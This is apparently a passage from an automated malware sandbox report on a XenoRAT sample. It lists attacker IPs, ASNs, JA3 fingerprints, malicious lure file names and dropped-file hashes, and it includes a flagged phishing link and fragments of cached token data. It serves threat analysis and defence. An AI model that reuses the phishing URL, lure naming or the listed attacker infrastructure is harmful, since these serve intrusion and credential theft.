                                                                                                                                    • 199.232.210.172
                                                                                                                                    Q6OOwHYZzH.exeGet hashmaliciousDCRatBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    List of required items.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    TTSIpRHKZz.exeGet hashmaliciousBabadeda, Binder HackToolBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    7rTjhbfF6L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.214.172

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUS6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 13.107.246.63
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 52.113.195.132
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 52.113.195.132
                                                                                                                                    jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 23.102.19.194
                                                                                                                                    jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 20.201.109.244
                                                                                                                                    jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 20.157.99.220
                                                                                                                                    jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 20.181.37.3
                                                                                                                                    jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 159.27.209.232
                                                                                                                                    jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 13.71.38.171
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 13.107.246.63
                                                                                                                                    SARNICA-ASBGTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    zVUq6L4FrV.docGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Estado de cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Estado_de_cuenta.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    zZeXr4mg0S.exeGet hashmaliciousLokibotBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                                    • 94.156.167.85
                                                                                                                                    UNACS-AS-BG8000BurgasBGTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    zVUq6L4FrV.docGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    weedntpd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                    • 87.120.112.101
                                                                                                                                    weedopenssh.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                    • 87.120.112.101
                                                                                                                                    weedbash.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                    • 87.120.112.101
                                                                                                                                    weedapache2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                    • 87.120.112.101
                                                                                                                                    weedcron.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                    • 87.120.112.101

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    6271f898ce5be7dd52b0fc260d0662b3TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Software_Tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    3qvTuHPZz2.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    73cceb_de0cf39691b24825b9733575e081f7fa.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    BUNKER INVOICE MV SUN OCEAN.pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Bunker_STS_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Payment_Advice.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousQuasarBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57

                                                                                                                                    Dropped Files

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exeTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                      Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                        dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                            Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                              dHrrqccwkL.docGet hashmaliciousXenoRATBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):118
                                                                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310720
                                                                                                                                                Entropy (8bit):0.7067089662958794
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqz:2JIB/wUKUKQncEmYRTwh0P
                                                                                                                                                MD5:5A826E0E27D6A328F0EB469F2C14EAAB
                                                                                                                                                SHA1:A508A7CB5C63DE45BCB1BA7A80F80615AE7F0690
                                                                                                                                                SHA-256:3A3F48F051D30129484D35BC2CAD68C9BF59302BCAC2008460E52993E237EB01
                                                                                                                                                SHA-512:FD120034C3F7ECB85307B01A3FED5C5E354D24BECF1A523F255B4E18A1EF12A4329A034597A9A9A676DEF67922AA41FC5EFFC27D2577E1FF93E9D5151D21A61F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x36e7cdbd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310720
                                                                                                                                                Entropy (8bit):0.7900001668379976
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                                                                                                                MD5:1827183A8CE7CECA31E4DA847A469D4B
                                                                                                                                                SHA1:CA35372F23EB4E2959BA5C0EA3CFFC470370BDF3
                                                                                                                                                SHA-256:C77367967F885A0F3BDF6A0594ED2624D3C9A50A9805B0F29B66528879C292AD
                                                                                                                                                SHA-512:958A1ABCF44D61AA65A907CCCBEDD49A474AC951A507BDF921FD841911D731B00AE3955E2EB3125538DD59C7A02D4B6964525D982449E5A140A27FFF34C88762
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:6..... ...............X\...;...{......................0.`.....42...{5..4...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................P..D.4...|..................L.\..4...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16384
                                                                                                                                                Entropy (8bit):0.08196467919824885
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:x4S/llKYeNtgvkgGqt/57Dek3JlnZevXAllEqW3l/TjzzQ/t:KyKzNtDgHR3t0Amd8/
                                                                                                                                                MD5:3ABF4E0937E7ADA59EA529AE0F5488A7
                                                                                                                                                SHA1:2DC122C572477A07A06F78B051DEBE8DE21EF511
                                                                                                                                                SHA-256:8409C3A405B952DBFD0C620E079C50C30121BF2EDEF66D7ACA2759DCD79D5539
                                                                                                                                                SHA-512:97B67478ACCF0376E82BAD89F98FF883039D03ACE37D2678AE307F5C1908A81B3937FBDFCAD99000A0F0067A9CD1DA906E7CD49CC6D315158B633AACB3076532
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:&.c......................................;...{...4...|..42...{5.........42...{5.42...{5...Y.42...{59................L.\..4...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GFKMTE.exe.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):706
                                                                                                                                                Entropy (8bit):5.349842958726647
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
                                                                                                                                                MD5:873FA73F7EAAC5A90DC38988855C5032
                                                                                                                                                SHA1:694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
                                                                                                                                                SHA-256:501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
                                                                                                                                                SHA-512:3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):521377
                                                                                                                                                Entropy (8bit):4.9084889265453135
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                                                MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                                                SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                                                SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                                                SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):773040
                                                                                                                                                Entropy (8bit):6.55939673749297
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                                                MD5:4296A064B917926682E7EED650D4A745
                                                                                                                                                SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                                                SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                                                SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2278
                                                                                                                                                Entropy (8bit):3.8567198029111625
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:uiTrlKxsxx8xl9Il8uLKNbdDsHS7Fd8YPstVF7d1rc:vQY0BBuSlstXc
                                                                                                                                                MD5:EDE6406EE4BE179B2A475A047BE81D93
                                                                                                                                                SHA1:2EBF05C8E693DEB7C3322AEDEEE15D2218BDB72D
                                                                                                                                                SHA-256:AF9C4CA20F88A0944FBDF1C0B8F2B6B85CD319C9176323D02FFC34DF95AD3231
                                                                                                                                                SHA-512:3CC98C9C303C336CCC4D5DC3EA6113655203C460D2E040D6A0FCC6A8E9B0C14F196DE1221B19DAAEFA2988CA63B04BEF977978A0A5A1E2CD818F373FBDE81BF0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.D.t.b.7.Q.Z.K.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.v.S.e.g.D.

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2684
                                                                                                                                                Entropy (8bit):3.9133499873293944
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:uiTrlKxJxCmLxl9Il8uLKAmntN4jEjc6d97T6fYtGAU3Psnpgy1Dd/vc:3EY0AmntKd6dwQFEUnpL1e
                                                                                                                                                MD5:A0C271CF760C914F066698D90126502D
                                                                                                                                                SHA1:F893EC5FC0CB0EC7E5767F49E8B0FE7E48B1089B
                                                                                                                                                SHA-256:42E5E1811BEA161F9EC612D11A2AD1DFC515A6256CC2319DCD5621A7B018CA1F
                                                                                                                                                SHA-512:F41601929FDA288D2FDAA7D35AEECD775E60DEA47BC3BA0A5798A06BC2D51C6B98133A00A1BE14AEB59BE34084DF822ECCA1FCA648FE9AD972F81AE32296FF85
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.C.y.N.B.N.B.o.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.v.S.e.g.D.

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4542
                                                                                                                                                Entropy (8bit):4.002544533698934
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:LY0c0R2EMtwjvFBUT2VHkRnum6a6mc0IC7SZ0UwT9k:LLQVtwjvFeidCulnLC7i0jT6
                                                                                                                                                MD5:97FC6D87019B7C473B69A1E96FEB61F6
                                                                                                                                                SHA1:6F97B8156C44FC7735271D6E9FFF634E57B8F9FA
                                                                                                                                                SHA-256:658DA69A83434A78986CD5251533989C0A67320CA7870091B84D1657D88997FB
                                                                                                                                                SHA-512:7625D231395EC69448D07651CEBD185C9675DEEA76E79E6E4B71484065A183A277EAD2F0B4DC82D8EEAB46DBB0DDF9FE0AD160C305089B73086D120E5881C2AD
                                                                                                                                                Malicious:false
